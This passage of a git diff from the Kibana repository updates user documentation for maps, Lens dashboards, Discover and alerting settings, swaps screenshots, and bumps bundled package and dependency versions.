the document table looks and works. To use the new *Document Explorer* instead of the classic view, turn off this option. The *Document Explorer* offers better data sorting, resizable columns, and a full screen view. +[[truncate-max-height]]`truncate:maxHeight`:: +The maximum height that a cell in a table can occupy. To disable truncation, set to 0. + + [float] [[kibana-ml-settings]] ==== Machine Learning @@ -448,9 +456,8 @@ Includes {ref}/frozen-indices.html[frozen indices] in results. Searching through frozen indices might increase the search time. This setting is off by default. Users must opt-in to include frozen indices. -[[search-timeout]]`search:timeout`:: Change the maximum timeout for a search -session or set to 0 to disable the timeout and allow queries to run to -completion. +[[search-timeout]]`search:timeout`:: Change the maximum timeout, in milliseconds (ms), for a search +session. To disable the timeout and allow queries to run to completion, set to 0. The default is 600,000 ms, or 10 minutes. [float] [[kibana-siem-settings]] diff --git a/docs/maps/images/gs-filter-icon.png b/docs/maps/images/gs-filter-icon.png new file mode 100644 index 0000000000000..aebe2d51873fd Binary files /dev/null and b/docs/maps/images/gs-filter-icon.png differ diff --git a/docs/maps/images/gs_add_cloropeth_layer.png b/docs/maps/images/gs_add_cloropeth_layer.png index 10774c69adbba..63dc1e3db2cfe 100644 Binary files a/docs/maps/images/gs_add_cloropeth_layer.png and b/docs/maps/images/gs_add_cloropeth_layer.png differ diff --git a/docs/maps/images/gs_add_es_document_layer.png b/docs/maps/images/gs_add_es_document_layer.png index 4656933552f26..35a9192634edc 100644 Binary files a/docs/maps/images/gs_add_es_document_layer.png and b/docs/maps/images/gs_add_es_document_layer.png differ diff --git a/docs/maps/images/gs_dashboard_with_map.png b/docs/maps/images/gs_dashboard_with_map.png index b7d4a7b63ed30..81fc181e698e9 100644 Binary files a/docs/maps/images/gs_dashboard_with_map.png and b/docs/maps/images/gs_dashboard_with_map.png differ diff --git a/docs/maps/images/gs_map_filtered.png b/docs/maps/images/gs_map_filtered.png new file mode 100644 index 0000000000000..f69b2e7397d57 Binary files /dev/null and b/docs/maps/images/gs_map_filtered.png differ diff --git a/docs/maps/images/gs_tooltip_filter.png b/docs/maps/images/gs_tooltip_filter.png new file mode 100644 index 0000000000000..3de04f846c8ae Binary files /dev/null and b/docs/maps/images/gs_tooltip_filter.png differ diff --git a/docs/maps/images/sample_data_web_logs.png b/docs/maps/images/sample_data_web_logs.png index 76ff9c0d16221..080824cf47687 100644 Binary files a/docs/maps/images/sample_data_web_logs.png and b/docs/maps/images/sample_data_web_logs.png differ diff --git a/docs/maps/maps-getting-started.asciidoc b/docs/maps/maps-getting-started.asciidoc index d4da7ef8aae2e..317a9657f1965 100644 --- a/docs/maps/maps-getting-started.asciidoc +++ b/docs/maps/maps-getting-started.asciidoc @@ -34,7 +34,7 @@ refer to <>. . Open the main menu, and then click *Dashboard*. . Click **Create dashboard**. . Set the time range to *Last 7 days*. -. Click the **Create new Maps** icon image:maps/images/app_gis_icon.png[] +. Click the **Create new Maps** icon image:maps/images/app_gis_icon.png[]. [float] [[maps-add-choropleth-layer]] @@ -46,7 +46,7 @@ and lighter shades will symbolize countries with less traffic. . Click **Add layer**, and then click **Choropleth**. -. From the **Layer** dropdown menu, select **World Countries**. +. From the **EMS boundaries** dropdown menu, select **World Countries**. . In **Statistics source**, set: ** **Data view** to **kibana_sample_data_logs** @@ -62,12 +62,12 @@ and lighter shades will symbolize countries with less traffic. . Add a Tooltip field: ** **ISO 3166-1 alpha-2 code** is added by default. -** Click **+ Add** to open field select. +** Click **+ Add** to open the field select. ** Select **name** and click *Add*. . In **Layer style**: -** Set **Fill color: As number** to the grey color ramp. +** Set **Fill color > As number** to the grey color ramp. ** Set **Border color** to white. ** Under **Label**, change **By value** to **Fixed**. @@ -76,7 +76,7 @@ and lighter shades will symbolize countries with less traffic. Your map now looks like this: + [role="screenshot"] -image::maps/images/gs_add_cloropeth_layer.png[] +image::maps/images/gs_add_cloropeth_layer.png[Map showing the Total Requests by Destination layer] [float] [[maps-add-elasticsearch-layer]] @@ -107,7 +107,7 @@ The layer is only visible when users zoom in. . Add a tooltip field and select **agent**, **bytes**, **clientip**, **host**, **machine.os**, **request**, **response**, and **timestamp**. -. In **Scaling**, set *Limits results to 10,000.* +. In **Scaling**, enable *Limit results to 10,000.* . In **Layer style**, set **Fill color** to **#2200FF**. @@ -116,7 +116,7 @@ The layer is only visible when users zoom in. Your map will look like this from zoom level 9 to 24: + [role="screenshot"] -image::maps/images/gs_add_es_document_layer.png[] +image::maps/images/gs_add_es_document_layer.png[Map showing what zoom level looks like a level 9] [float] ==== Add a layer for aggregated data @@ -140,14 +140,14 @@ grids with less bytes transferred. ** Click **Add metric**. ** Set **Aggregation** to **Sum** with **Field** set to **bytes**. . In **Layer style**, change **Symbol size**: -** Set the field select to *sum bytes*. +** Set *By value* to *sum bytes*. ** Set the min size to 7 and the max size to 25 px. . Click **Save & close** button. + Your map will look like this between zoom levels 0 and 9: + [role="screenshot"] -image::maps/images/sample_data_web_logs.png[] +image::maps/images/sample_data_web_logs.png[Map showing what zoom level 3 looks like] [float] [[maps-save]] @@ -164,10 +164,10 @@ View your geospatial data alongside a heat map and pie chart, and then filter th When you apply a filter in one panel, it is applied to all panels on the dashboard. . Click **Add from library** to open a list of panels that you can add to the dashboard. -. Add **[Logs] Unique Visitor Heatmap** and **[Logs] Bytes distribution** to the dashboard. +. Add **[Logs] Unique Destination Heatmap** and **[Logs] Bytes distribution** to the dashboard. + [role="screenshot"] -image::maps/images/gs_dashboard_with_map.png[] +image::maps/images/gs_dashboard_with_map.png[Map in a dashboard with 2 other panels] . To filter for documents with unusually high byte values, click and drag in the *Bytes distribution* chart. @@ -177,10 +177,15 @@ image::maps/images/gs_dashboard_with_map.png[] .. Open a tooltip by clicking anywhere in the United States vector. -.. To show only documents where **geo.src** is **US**, click the filter icon in the row for **ISO 3066-1 alpha-2**. +.. To show only documents where **geo.src** is **US**, click the filter icon image:maps/images/gs-filter-icon.png[filter icon, width=24px]in the row for **ISO 3066-1 alpha-2**. ++ +[role="screenshot"] +image::maps/images/gs_tooltip_filter.png[Tooltip on map, width=75%] ++ +Your filtered map should look similar to this: + [role="screenshot"] -image::maps/images/gs_dashboard_with_terms_filter.png[] +image::maps/images/gs_map_filtered.png[Map showing filtered data] [float] === What's next? diff --git a/docs/settings/alert-action-settings.asciidoc b/docs/settings/alert-action-settings.asciidoc index 95003a08b7b09..014ee4e69dca1 100644 --- a/docs/settings/alert-action-settings.asciidoc +++ b/docs/settings/alert-action-settings.asciidoc @@ -143,6 +143,22 @@ Specifies preconfigured connector IDs and configs. Default: {}. `xpack.actions.proxyUrl` {ess-icon}:: Specifies the proxy URL to use, if using a proxy for actions. By default, no proxy is used. ++ +Proxies may be used to proxy http or https requests through a proxy using the http or https protocol. Kibana only uses proxies in "CONNECT" mode (sometimes referred to as "tunneling" TCP mode, compared to HTTP mode). That is, Kibana will always make requests through a proxy using the HTTP `CONNECT` method. ++ +If your proxy is using the https protocol (vs the http protocol), the setting `xpack.actions.ssl.proxyVerificationMode: none` will likely be needed, unless your proxy's certificates are signed using a publicly available certificate authority. ++ +There is currently no support for using basic authentication with a proxy (authentication for the proxy itself, not the URL being requested through the proxy). ++ +To help diagnose problems using a proxy, you can use the `curl` command with options to use your proxy, and log debug information, with the following command, replacing the proxy and target URLs as appropriate. This will force the request to be made to the +proxy in tunneling mode, and display some of the interaction between the client and the proxy. ++ +[source,sh] +-- +curl --verbose --proxytunnel --proxy http://localhost:8080 http://example.com +-- ++ + `xpack.actions.proxyBypassHosts` {ess-icon}:: Specifies hostnames which should not use the proxy, if using a proxy for actions. The value is an array of hostnames as strings. By default, all hosts will use the proxy, but if an action's hostname is in this list, the proxy will not be used. The settings `xpack.actions.proxyBypassHosts` and `xpack.actions.proxyOnlyHosts` cannot be used at the same time. @@ -210,6 +226,9 @@ Specifies the behavior when a new or changed rule has a schedule interval less t `xpack.alerting.rules.run.actions.max` {ess-icon}:: Specifies the maximum number of actions that a rule can generate each time detection checks run. +`xpack.alerting.rules.run.alerts.max` {ess-icon}:: +Specifies the maximum number of alerts that a rule can generate each time detection checks run. Default: 1000. + `xpack.alerting.rules.run.timeout` {ess-icon}:: Specifies the default timeout for tasks associated with all types of rules. The time is formatted as: + diff --git a/docs/user/dashboard/aggregation-based.asciidoc b/docs/user/dashboard/aggregation-based.asciidoc index 842f2e93bc58e..4ca251b3a1936 100644 --- a/docs/user/dashboard/aggregation-based.asciidoc +++ b/docs/user/dashboard/aggregation-based.asciidoc @@ -140,9 +140,11 @@ a bar chart that displays the top five log traffic sources for every three hours Add the sample web logs data that you'll use to create the bar chart, then create the dashboard. -. From the *Home* page, click *Try our sample data*. +. On the home page, click *Try sample data*. -. From *Sample web logs*, click *Add data*. +. Click *Other sample data sets*. + +. On the *Sample web logs* card, click *Add data*. . Open the main menu, then click *Dashboard*. @@ -153,9 +155,9 @@ Add the sample web logs data that you'll use to create the bar chart, then creat Open the *Aggregation based* editor and change the time range. -. On the dashboard, click *All types > Aggregation based*, select *Vertical bar*, then select *kibana_sample_data_logs*. +. On the dashboard, click *All types > Aggregation based*, select *Vertical bar*, then select *Kibana Sample Data Logs*. -. Make sure the <>> is *Last 7 days*. +. Make sure the <> is *Last 7 days*. [float] [[tutorial-configure-the-bar-chart]] @@ -172,7 +174,7 @@ To create the bar chart, add a <>, then .. Click *Update*. + [role="screenshot"] -image:images/aggBased_barChartTutorial1_8.3.png[Bar chart with sample logs data] +image:images/aggBased_barChartTutorial1_8.4.png[Bar chart with sample logs data] . To show the top five log traffic sources, add a sub-bucket aggregation. @@ -187,7 +189,7 @@ TIP: Aggregation-based panels support a maximum of three *Split series*. .. Click *Update*. + [role="screenshot"] -image:images/aggBased_barChartTutorial2_8.3.png[Bar chart with sample logs data] +image:images/aggBased_barChartTutorial2_8.4.png[Bar chart with sample logs data] [float] [[save-the-aggregation-based-panel]] diff --git a/docs/user/dashboard/images/aggBased_barChartTutorial1_8.3.png b/docs/user/dashboard/images/aggBased_barChartTutorial1_8.3.png deleted file mode 100644 index a30fe3fbd1b78..0000000000000 Binary files a/docs/user/dashboard/images/aggBased_barChartTutorial1_8.3.png and /dev/null differ diff --git a/docs/user/dashboard/images/aggBased_barChartTutorial1_8.4.png b/docs/user/dashboard/images/aggBased_barChartTutorial1_8.4.png new file mode 100644 index 0000000000000..9e43d6e61a656 Binary files /dev/null and b/docs/user/dashboard/images/aggBased_barChartTutorial1_8.4.png differ diff --git a/docs/user/dashboard/images/aggBased_barChartTutorial2_8.3.png b/docs/user/dashboard/images/aggBased_barChartTutorial2_8.3.png deleted file mode 100644 index d1d7f0644db31..0000000000000 Binary files a/docs/user/dashboard/images/aggBased_barChartTutorial2_8.3.png and /dev/null differ diff --git a/docs/user/dashboard/images/aggBased_barChartTutorial2_8.4.png b/docs/user/dashboard/images/aggBased_barChartTutorial2_8.4.png new file mode 100644 index 0000000000000..ea6727c0ca47d Binary files /dev/null and b/docs/user/dashboard/images/aggBased_barChartTutorial2_8.4.png differ diff --git a/docs/user/dashboard/images/lens_dataViewDropDown_8.0.png b/docs/user/dashboard/images/lens_dataViewDropDown_8.0.png deleted file mode 100644 index 309e1be49b9db..0000000000000 Binary files a/docs/user/dashboard/images/lens_dataViewDropDown_8.0.png and /dev/null differ diff --git a/docs/user/dashboard/images/lens_dataViewDropDown_8.3.png b/docs/user/dashboard/images/lens_dataViewDropDown_8.3.png deleted file mode 100644 index 857f28303b8cb..0000000000000 Binary files a/docs/user/dashboard/images/lens_dataViewDropDown_8.3.png and /dev/null differ diff --git a/docs/user/dashboard/images/lens_dataViewDropDown_8.4.0.png b/docs/user/dashboard/images/lens_dataViewDropDown_8.4.0.png new file mode 100644 index 0000000000000..990cebfc51f6f Binary files /dev/null and b/docs/user/dashboard/images/lens_dataViewDropDown_8.4.0.png differ diff --git a/docs/user/dashboard/images/lens_lineChartMetricOverTime_8.4.0.png b/docs/user/dashboard/images/lens_lineChartMetricOverTime_8.4.0.png new file mode 100644 index 0000000000000..9ed9b4730fae4 Binary files /dev/null and b/docs/user/dashboard/images/lens_lineChartMetricOverTime_8.4.0.png differ diff --git a/docs/user/dashboard/images/lens_logsDashboard_7.16.png b/docs/user/dashboard/images/lens_logsDashboard_7.16.png deleted file mode 100644 index cdfe0accdbbb5..0000000000000 Binary files a/docs/user/dashboard/images/lens_logsDashboard_7.16.png and /dev/null differ diff --git a/docs/user/dashboard/images/lens_logsDashboard_8.3.png b/docs/user/dashboard/images/lens_logsDashboard_8.3.png deleted file mode 100644 index 089fd5dcadb0c..0000000000000 Binary files a/docs/user/dashboard/images/lens_logsDashboard_8.3.png and /dev/null differ diff --git a/docs/user/dashboard/images/lens_logsDashboard_8.4.0.png b/docs/user/dashboard/images/lens_logsDashboard_8.4.0.png new file mode 100644 index 0000000000000..1801fea4e0620 Binary files /dev/null and b/docs/user/dashboard/images/lens_logsDashboard_8.4.0.png differ diff --git a/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_7.16.png b/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_7.16.png deleted file mode 100644 index bed6acf501a3a..0000000000000 Binary files a/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_7.16.png and /dev/null differ diff --git a/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_8.4.0.png b/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_8.4.0.png new file mode 100644 index 0000000000000..f3b1603b50bef Binary files /dev/null and b/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_8.4.0.png differ diff --git a/docs/user/dashboard/images/lens_pieChartCompareSubsetOfDocs_7.16.png b/docs/user/dashboard/images/lens_pieChartCompareSubsetOfDocs_7.16.png index f8e8ba98f691e..fdeca77da25fb 100644 Binary files a/docs/user/dashboard/images/lens_pieChartCompareSubsetOfDocs_7.16.png and b/docs/user/dashboard/images/lens_pieChartCompareSubsetOfDocs_7.16.png differ diff --git a/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.0.png b/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.0.png deleted file mode 100644 index 3a7cc44b820ee..0000000000000 Binary files a/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.0.png and /dev/null differ diff --git a/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.4.0.png b/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.4.0.png new file mode 100644 index 0000000000000..a86dbed105eff Binary files /dev/null and b/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.4.0.png differ diff --git a/docs/user/dashboard/lens-advanced.asciidoc b/docs/user/dashboard/lens-advanced.asciidoc index 68516b49d2158..04822444c530e 100644 --- a/docs/user/dashboard/lens-advanced.asciidoc +++ b/docs/user/dashboard/lens-advanced.asciidoc @@ -16,7 +16,9 @@ Before you begin, you should be familiar with the <>. Add the sample ecommerce data, and create and set up the dashboard. -. Go to the *Home* page, then click *Try sample data*. +. On the home page, click *Try sample data*. + +. Click *Other sample data sets*. . On the *Sample eCommerce orders* card, click *Add data*. diff --git a/docs/user/dashboard/lens.asciidoc b/docs/user/dashboard/lens.asciidoc index 8e8ffe902a565..80e1665753c15 100644 --- a/docs/user/dashboard/lens.asciidoc +++ b/docs/user/dashboard/lens.asciidoc @@ -73,7 +73,7 @@ Change the fields list to display a different {data-source}, different time rang * To add fields, open the {data-source} dropdown, then select *Add a field to this {data-source}*. + [role="screenshot"] -image:images/lens_dataViewDropDown_8.3.png[Dropdown menu located next to {data-source} field with items for adding and managing fields] +image:images/lens_dataViewDropDown_8.4.0.png[Dropdown menu located next to {data-source} field with items for adding and managing fields] + For more information about adding fields to {data-sources} and examples, refer to <>. diff --git a/docs/user/dashboard/tutorial-create-a-dashboard-of-lens-panels.asciidoc b/docs/user/dashboard/tutorial-create-a-dashboard-of-lens-panels.asciidoc index 1d4d5d70e879e..95f937bb65443 100644 --- a/docs/user/dashboard/tutorial-create-a-dashboard-of-lens-panels.asciidoc +++ b/docs/user/dashboard/tutorial-create-a-dashboard-of-lens-panels.asciidoc @@ -8,7 +8,7 @@ at website logs, but this type of dashboard works on any type of data. When you're done, you'll have a complete overview of the sample web logs data. [role="screenshot"] -image::images/lens_logsDashboard_8.3.png[Logs dashboard] +image::images/lens_logsDashboard_8.4.0.png[Logs dashboard] Before you begin, you should be familiar with the <>. @@ -18,7 +18,9 @@ Before you begin, you should be familiar with the <>. Add the sample web logs data, and create and set up the dashboard. -. Go to the *Home* page, then click *Try sample data*. +. On the home page, click *Try sample data*. + +. Click *Other sample data sets*. . On the *Sample web logs* card, click *Add data*. @@ -38,10 +40,10 @@ Open the visualization editor, then make sure the correct fields appear. . On the dashboard, click *Create visualization*. -. Make sure the *kibana_sample_data_logs* data view appears. +. Make sure the *{kib} Sample Data Logs* {data-source} appears. + [role="screenshot"] -image::images/lens_dataViewDropDown_8.3.png[Data view dropdown] +image::images/lens_dataViewDropDown_8.4.0.png[Data view dropdown] To create the visualizations in this tutorial, you'll use the following fields: @@ -68,12 +70,12 @@ The only number function that you can use with *clientip* is *Unique count*, als . Open the *Visualization type* dropdown, then select *Metric*. + [role="screenshot"] -image::images/lens_visualizationTypeDropdown_8.0.png[Visualization type dropdown] +image::images/lens_visualizationTypeDropdown_8.4.0.png[Visualization type dropdown] . From the *Available fields* list, drag *clientip* to the workspace or layer pane. + [role="screenshot"] -image::images/lens_metricUniqueCountOfClientip_7.16.png[Metric visualization of the clientip field] +image::images/lens_metricUniqueCountOfClientip_8.4.0.png[Metric visualization of the clientip field] + In the layer pane, *Unique count of clientip* appears because the editor automatically applies the *Unique count* function to the *clientip* field. *Unique count* is the only numeric function that works with IP addresses. @@ -133,7 +135,7 @@ image::images/lens_lineChartMetricOverTimeLeftAxis_8.3.png[Left axis menu] . Open the *Bottom axis* menu, then select *None* from the *Axis title* dropdown. + [role="screenshot"] -image::images/lens_lineChartMetricOverTimeBottomAxis_8.3.png[Line chart that displays metric data over time] +image::images/lens_lineChartMetricOverTimeBottomAxis_8.3.png[Bottom axis menu] . Click *Save and return* @@ -142,6 +144,9 @@ Since you removed the axis labels, add a panel title: . Open the panel menu, then select *Edit panel title*. . In the *Panel title* field, enter `Median of bytes`, then click *Save*. ++ +[role="screenshot"] +image::images/lens_lineChartMetricOverTime_8.4.0.png[Line chart that displays metric data over time] [discrete] [[view-the-distribution-of-visitors-by-operating-system]] @@ -174,7 +179,7 @@ The chart labels are unable to display because the *request.keyword* field conta [role="screenshot"] image::images/lens_end_to_end_2_1_2.png[Table with top values of request.keyword by most unique visitors] -. In the layer pane, click *Top values of request.keyword*. +. In the layer pane, click *Top 5 values of request.keyword*. .. In the *Number of values* field, enter `10`. @@ -201,7 +206,7 @@ Create a proportional visualization that helps you determine if your users trans . In the layer pane, click *Median of bytes*. -. Click the *Sum* function, then click *Close*. +. Click the *Sum* quick function, then click *Close*. . From the *Available fields* list, drag *bytes* to the *Break down by* field in the layer pane. @@ -256,7 +261,7 @@ The distribution of a number can help you find patterns. For example, you can an . In the layer pane, click *Median of bytes*. -.. Click the *Sum* function. +.. Click the *Sum* quick function. .. In the *Name* field, enter `Transferred bytes`. @@ -293,7 +298,7 @@ Add a panel title: Create a filter for each website traffic source: -. Click the *Filters* function. +. Click *Filters*. . Click *All records*, enter the following in the query bar, then press Return: @@ -319,14 +324,14 @@ Add the user geography grouping: . From the *Available fields* list, drag *geo.srcdest* to the workspace. -. To change the *Group by* order, drag *Top values of geo.srcdest* in the layer pane so that appears first. +. To change the *Group by* order, drag *Top 3 values of geo.srcdest* in the layer pane so that appears first. + [role="screenshot"] image::images/lens_end_to_end_7_2.png[Treemap visualization] Remove the documents that do not match the filter criteria: -. In the layer pane, click *Top values of geo.srcdest*. +. In the layer pane, click *Top 3 values of geo.srcdest*. . Click *Advanced*, deselect *Group other values as "Other"*, then click *Close*. + @@ -358,7 +363,7 @@ Decrease the size of the following panels, then move the panels to the first row * *Website traffic* + [role="screenshot"] -image::images/lens_logsDashboard_8.3.png[Logs dashboard] +image::images/lens_logsDashboard_8.4.0.png[Logs dashboard] [discrete] === Save the dashboard diff --git a/docs/user/dashboard/vega.asciidoc b/docs/user/dashboard/vega.asciidoc index 9c58b9d0ecf49..371b8b949c72a 100644 --- a/docs/user/dashboard/vega.asciidoc +++ b/docs/user/dashboard/vega.asciidoc @@ -40,9 +40,11 @@ As you edit the specs, work in small steps, and frequently save your work. Small Before starting, add the eCommerce sample data that you'll use in your spec, then create the dashboard. -. From the {kib} *Home* page, click *Try our sample data*. +. On the home page, click *Try sample data*. -. From *eCommerce sample data*, click *Add data*. +. Click *Other sample data sets*. + +. On the *Sample eCommerce orders* card, click *Add data*. . Open the main menu, then click *Dashboard*. diff --git a/docs/user/discover.asciidoc b/docs/user/discover.asciidoc index 26a6eafd8086d..fab5dc372feac 100644 --- a/docs/user/discover.asciidoc +++ b/docs/user/discover.asciidoc @@ -54,7 +54,7 @@ Tell {kib} where to find the data you want to explore, and then specify the time + {kib} uses a <> to tell it where to find your {es} data. -To view the ecommerce sample data, open the {data-source} menu, and select **kibana_sample_data_ecommerce**. +To view the ecommerce sample data, open the {data-source} menu, and then select **Kibana Sample Data Ecommerce**. + [role="screenshot"] image::images/discover-data-view.png[How to set the {data-source} in Discover, width=50%] @@ -118,7 +118,7 @@ You can add a runtime field to your {data-source} from inside of **Discover**, and then use that field for analysis and visualizations, the same way you do with other fields. -. Open the data view menu, and then click *Add a field to this data view*. +. In the sidebar, click *Add a field*. . In the *Create field* form, enter `hello` for the name. @@ -191,7 +191,7 @@ and more. Exclude documents where day of week is not Wednesday: -. Click image:images/add-icon.png[Add icon] to the left of the query bar. +. Click image:images/add-icon.png[Add icon] next to the query bar. . In the *Add filter* pop-up, set *Field* to *day_of_week*, *Operator* to *is not*, and *Value* to *Wednesday*. + [role="screenshot"] @@ -289,7 +289,7 @@ The *Create rule* form is pre-filled with the latest query sent to {es}. . Click *Save*. -For more about this and other rules provided in {kib} {alert-features}, go to <>. +For more about this and other rules provided in {alert-features}, go to <>. [float] diff --git a/docs/user/security/api-keys/index.asciidoc b/docs/user/security/api-keys/index.asciidoc index 3011f17ee08c8..3efb2cdeef6ca 100644 --- a/docs/user/security/api-keys/index.asciidoc +++ b/docs/user/security/api-keys/index.asciidoc @@ -47,7 +47,7 @@ curl --location --request GET 'http://localhost:5601/api/security/role' \ [IMPORTANT] ============================================================================ -API keys are intended for programatic access to {kib} and {es). Do not use API keys to authenticate access via a web browser. +API keys are intended for programmatic access to {kib} and {es}. Do not use API keys to authenticate access via a web browser. ============================================================================ [float] diff --git a/docs/user/security/authentication/index.asciidoc b/docs/user/security/authentication/index.asciidoc index 9b3d4b0f831f8..d0280ca8e2f40 100644 --- a/docs/user/security/authentication/index.asciidoc +++ b/docs/user/security/authentication/index.asciidoc @@ -396,7 +396,7 @@ This type of authentication is usually useful for machine-to-machine interaction [IMPORTANT] ============================================================================ -API keys are intended for programatic access to {kib} and {es). Do not use API keys to authenticate access via a web browser. +API keys are intended for programmatic access to {kib} and {es}. Do not use API keys to authenticate access via a web browser. ============================================================================ diff --git a/fleet_packages.json b/fleet_packages.json index e082082c724db..c44aa910e6a0f 100644 --- a/fleet_packages.json +++ b/fleet_packages.json @@ -1,15 +1,14 @@ /* - Packages in this file are considered "bundled" and are installed as part of Fleet's setup process. Each entry points to a valid version name - avaiable in the Elastic Package Registry service, and must include a sha-512 checksum of the `.zip` archive for the given package. + Packages listed in this file are "bundled" with Kibana's built distributable, and are available + on disk rather than only in the configured package registry service. This allows Kibana to install + "stack-aligned" packages or those that are installed by default in an airgapped or offline environment. - You may opt in to using the "snapshot" environment of the EPR service by passing the `--use-epr-snapshot-registry` flag to `yarn build`. This will - cause the package archive download to pull from the "spapshot" environment instead of the "production" environment. Be aware that not all packages - exist in the snapshot environment, so you may have errors when fetching package versions. It's recommended to alter this file to contain _only_ the - packages you're testing when using the snapshot environment. + Packages will be fetched from https://epr-snapshot.elastic.co by default. This can be overridden + via the `--epr-registry=production` command line argument when building Kibana. Fetching from the + snapshot registry allows Kibana to bundle packages that have yet to be published to production in + order to prepare build candidates for the next release. - These files don't include any kind of checksum, but they should eventually include a package signature as introduced in https://github.com/elastic/elastic-package/issues/583 - in order to verify package integrity. */ [ @@ -23,7 +22,7 @@ }, { "name": "endpoint", - "version": "8.3.0" + "version": "8.4.1" }, { "name": "fleet_server", @@ -31,6 +30,6 @@ }, { "name": "synthetics", - "version": "0.10.1" + "version": "0.10.2" } ] diff --git a/legacy_rfcs/text/0015_bazel.md b/legacy_rfcs/text/0015_bazel.md index 82c93c3c7e9c1..390a2d68eb7ab 100644 --- a/legacy_rfcs/text/0015_bazel.md +++ b/legacy_rfcs/text/0015_bazel.md @@ -191,9 +191,9 @@ A `BUILD.bazel` file will be added to the root of each package defining a `build The `@kbn/pm` package was updated in https://github.com/elastic/kibana/pull/89961 to run the new packages build target, invoked by calling `bazel build //packages:build`, before executing the existing legacy package builds. -The build targets will no longer reside within the package themselves and instead will be within the `bazel/bin` directory. To account for this, any defined dependency will need to be updated to reference the new directory (example: `link:bazel/bin/packages/elastic-datemath`). While also in this transition period, the build will need to copy over the packages from `bazel/bin` into the `node_modules` of the build target. +The build targets will no longer reside within the package themselves and instead will be within the `bazel/bin` directory. To account for this, any defined dependency will need to be updated to reference the new directory (example: `link:bazel/bin/packages/kbn-datemath`). While also in this transition period, the build will need to copy over the packages from `bazel/bin` into the `node_modules` of the build target. -Example package BUILD.bazel for `packages/elastic-datemath`: +Example package BUILD.bazel for `packages/kbn-datemath`: ```python load("@build_bazel_rules_nodejs//:index.bzl", "pkg_npm") diff --git a/nav-kibana-dev.docnav.json b/nav-kibana-dev.docnav.json index 9aa3530578857..c1ea6f702483c 100644 --- a/nav-kibana-dev.docnav.json +++ b/nav-kibana-dev.docnav.json @@ -94,6 +94,9 @@ }, { "id": "kibDevKeyConceptsNavigation" + }, + { + "id": "kibDevDocsEmbeddables" } ] }, @@ -429,6 +432,9 @@ }, { "id": "kibVisualizationsPluginApi" + }, + { + "id": "kibDevDocsOpsTest" } ] }, @@ -563,6 +569,9 @@ }, { "id": "kibDevDocsOpsManagedVscodeConfigCli" + }, + { + "id": "kibDevDocsOpsTest" } ] } diff --git a/package.json b/package.json index 8e8bdcedc01c1..637aa2a26158b 100644 --- a/package.json +++ b/package.json @@ -102,8 +102,7 @@ "@dnd-kit/utilities": "^2.0.0", "@elastic/apm-rum": "^5.12.0", "@elastic/apm-rum-react": "^1.4.2", - "@elastic/apm-synthtrace": "link:bazel-bin/packages/elastic-apm-synthtrace", - "@elastic/charts": "47.1.1", + "@elastic/charts": "47.2.0", "@elastic/datemath": "5.0.3", "@elastic/elasticsearch": "npm:@elastic/elasticsearch-canary@8.3.0-canary.1", "@elastic/ems-client": "8.3.3", @@ -113,7 +112,6 @@ "@elastic/numeral": "^2.5.1", "@elastic/react-search-ui": "^1.14.0", "@elastic/request-crypto": "2.0.1", - "@elastic/safer-lodash-set": "link:bazel-bin/packages/elastic-safer-lodash-set", "@elastic/search-ui-app-search-connector": "^1.14.0", "@emotion/cache": "^11.9.3", "@emotion/css": "^11.9.0", @@ -139,7 +137,9 @@ "@kbn/analytics-shippers-elastic-v3-server": "link:bazel-bin/packages/analytics/shippers/elastic_v3/server", "@kbn/analytics-shippers-fullstory": "link:bazel-bin/packages/analytics/shippers/fullstory", "@kbn/apm-config-loader": "link:bazel-bin/packages/kbn-apm-config-loader", + "@kbn/apm-synthtrace": "link:bazel-bin/packages/kbn-apm-synthtrace", "@kbn/apm-utils": "link:bazel-bin/packages/kbn-apm-utils", + "@kbn/chart-icons": "link:bazel-bin/packages/kbn-chart-icons", "@kbn/coloring": "link:bazel-bin/packages/kbn-coloring", "@kbn/config": "link:bazel-bin/packages/kbn-config", "@kbn/config-mocks": "link:bazel-bin/packages/kbn-config-mocks", @@ -281,6 +281,7 @@ "@kbn/plugin-discovery": "link:bazel-bin/packages/kbn-plugin-discovery", "@kbn/react-field": "link:bazel-bin/packages/kbn-react-field", "@kbn/rule-data-utils": "link:bazel-bin/packages/kbn-rule-data-utils", + "@kbn/safer-lodash-set": "link:bazel-bin/packages/kbn-safer-lodash-set", "@kbn/securitysolution-autocomplete": "link:bazel-bin/packages/kbn-securitysolution-autocomplete", "@kbn/securitysolution-es-utils": "link:bazel-bin/packages/kbn-securitysolution-es-utils", "@kbn/securitysolution-hook-utils": "link:bazel-bin/packages/kbn-securitysolution-hook-utils", @@ -306,7 +307,6 @@ "@kbn/shared-ux-card-no-data": "link:bazel-bin/packages/shared-ux/card/no_data/impl", "@kbn/shared-ux-card-no-data-mocks": "link:bazel-bin/packages/shared-ux/card/no_data/mocks", "@kbn/shared-ux-card-no-data-types": "link:bazel-bin/packages/shared-ux/card/no_data/types", - "@kbn/shared-ux-components": "link:bazel-bin/packages/kbn-shared-ux-components", "@kbn/shared-ux-link-redirect-app": "link:bazel-bin/packages/shared-ux/link/redirect_app/impl", "@kbn/shared-ux-link-redirect-app-mocks": "link:bazel-bin/packages/shared-ux/link/redirect_app/mocks", "@kbn/shared-ux-link-redirect-app-types": "link:bazel-bin/packages/shared-ux/link/redirect_app/types", @@ -316,12 +316,20 @@ "@kbn/shared-ux-page-kibana-no-data": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/impl", "@kbn/shared-ux-page-kibana-no-data-mocks": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/mocks", "@kbn/shared-ux-page-kibana-no-data-types": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/types", + "@kbn/shared-ux-page-kibana-template": "link:bazel-bin/packages/shared-ux/page/kibana_template/impl", + "@kbn/shared-ux-page-kibana-template-mocks": "link:bazel-bin/packages/shared-ux/page/kibana_template/mocks", + "@kbn/shared-ux-page-kibana-template-types": 